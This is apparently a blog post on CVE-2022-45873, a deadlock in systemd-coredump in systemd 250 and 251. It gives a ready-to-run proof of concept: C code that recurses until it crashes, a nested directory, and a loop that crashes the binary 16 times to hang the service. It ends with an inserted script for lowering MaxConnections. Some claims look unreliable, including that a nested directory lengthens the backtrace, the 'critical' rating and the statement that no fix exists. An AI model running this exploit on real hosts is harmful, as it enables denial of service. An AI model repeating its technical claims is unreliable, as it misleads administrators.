A recent vulnerability has been uncovered in systemd versions 250 and 251, identified as CVE-2022-45873, which allows local users to achieve a systemd-coredump deadlock by triggering a crash with a long backtrace. This exploit takes advantage of a weak point in the parse_elf_object function found in the shared/elf-util.c file. In this post, we'll delve into the details of this vulnerability, provide code snippets, and offer reference links for further understanding and mitigation.

The exploitation methodology for this vulnerability can be broken down into the following steps:

1. Create a binary that crashes by calling a function recursively, leading to a stack overflow and causing a crash.

2. Place the binary in a deeply nested directory to ensure a long backtrace for the crash.

3. Trigger the crash 16 times when the MaxConnections=16 setting is configured for the systemd/units/systemd-coredump.socket file.

By doing this, an attacker can force a local deadlock in the systemd-coredump process, effectively rendering a targeted system unresponsive.

To create a binary that will crash by calling a function recursively, you can use this simple C code:

#include <stdio.h>

/* Unbounded recursion: each call adds a frame until the stack is exhausted
 * and the process is killed with SIGSEGV, which is what hands the crash to
 * systemd-coredump. */
void recursive_function(int counter) {
    printf("Recursion level: %d\n", counter);
    recursive_function(counter + 1);
}

int main(void) {
    recursive_function(0);   /* never returns */
    return 0;
}

Compile this code with gcc (no optimization, so the recursion is not turned into a loop):

gcc -o recursive_crash recursive_crash.c

To make the backtrace larger, move this binary to a deeply nested directory:

mkdir -p a/a/a/a/a/a/a
mv recursive_crash a/a/a/a/a/a/a/

Now, run the binary multiple times to trigger the crash:

for i in {1..16}; do
    ./a/a/a/a/a/a/a/recursive_crash
done

This vulnerability was discovered and reported by the following sources:

1. The original disclosure of the vulnerability can be found at MITRE
2. The systemd GitHub repository provides further details on the vulnerable code: systemd GitHub
3. The National Vulnerability Database (NVD) provides technical details and impact analysis: NVD - CVE-2022-45873

Mitigation

As of now, there is no official fix released for this vulnerability. However, one possible mitigation is to lower the MaxConnections setting for the systemd-coredump.socket file to reduce the attack surface. Moreover, it is advisable to monitor process crashes closely and investigate any abnormal behavior. Monitor for any official patches or updates addressing this issue and make sure to apply them as soon as possible.
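The following shell snippet is an added example and not part of the original post: it audits the effective MaxConnections value of systemd-coredump.socket and produces the drop-in that lowers it. The ceiling of 4, the drop-in file name, and the use of `systemctl show -p MaxConnections` for reading the live value are assumptions made for illustration.

```shell
# Added example: check the effective MaxConnections on systemd-coredump.socket
# and generate a drop-in override when it exceeds a chosen ceiling.
# The ceiling (4) and the drop-in path below are assumptions, not values
# from the advisory.

CEILING=4

# Return 0 when the "MaxConnections=N" line in $1 is at or below $2.
# $1 is the text printed by `systemctl show systemd-coredump.socket -p MaxConnections`.
coredump_limit_ok() {
    val=$(printf '%s\n' "$1" | sed -n 's/^MaxConnections=//p')
    [ -n "$val" ] && [ "$val" -le "$2" ]
}

# Print the drop-in unit fragment that enforces the ceiling given in $1.
coredump_dropin() {
    printf '[Socket]\nMaxConnections=%s\n' "$1"
}

# Live usage (installing the drop-in requires root):
#   current=$(systemctl show systemd-coredump.socket -p MaxConnections)
#   coredump_limit_ok "$current" "$CEILING" || {
#       mkdir -p /etc/systemd/system/systemd-coredump.socket.d
#       coredump_dropin "$CEILING" \
#           > /etc/systemd/system/systemd-coredump.socket.d/10-maxconn.conf
#       systemctl daemon-reload && systemctl restart systemd-coredump.socket
#   }

# Constructed sample of the default value, in the format systemctl show prints:
SAMPLE_DEFAULT='MaxConnections=16'
```

Lowering MaxConnections only shrinks how many concurrent dumps the socket will accept; it does not remove the underlying hang in parse_elf_object, so the check above is a stopgap to keep in place until a fixed systemd build is installed.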

Conclusion

CVE-2022-45873 is a critical vulnerability that affects systemd versions 250 and 251. By leveraging a local user's capabilities, an attacker can force a deadlock in the systemd-coredump process and potentially halt a targeted system entirely. It's vital for system administrators and security professionals to stay vigilant, watch out for updates, and apply any mitigating measures in the interim to prevent potential exploitation.

Timeline

Published on: 11/23/2022 23:15:00 UTC
Last modified on: 03/01/2023 14:27:00 UTC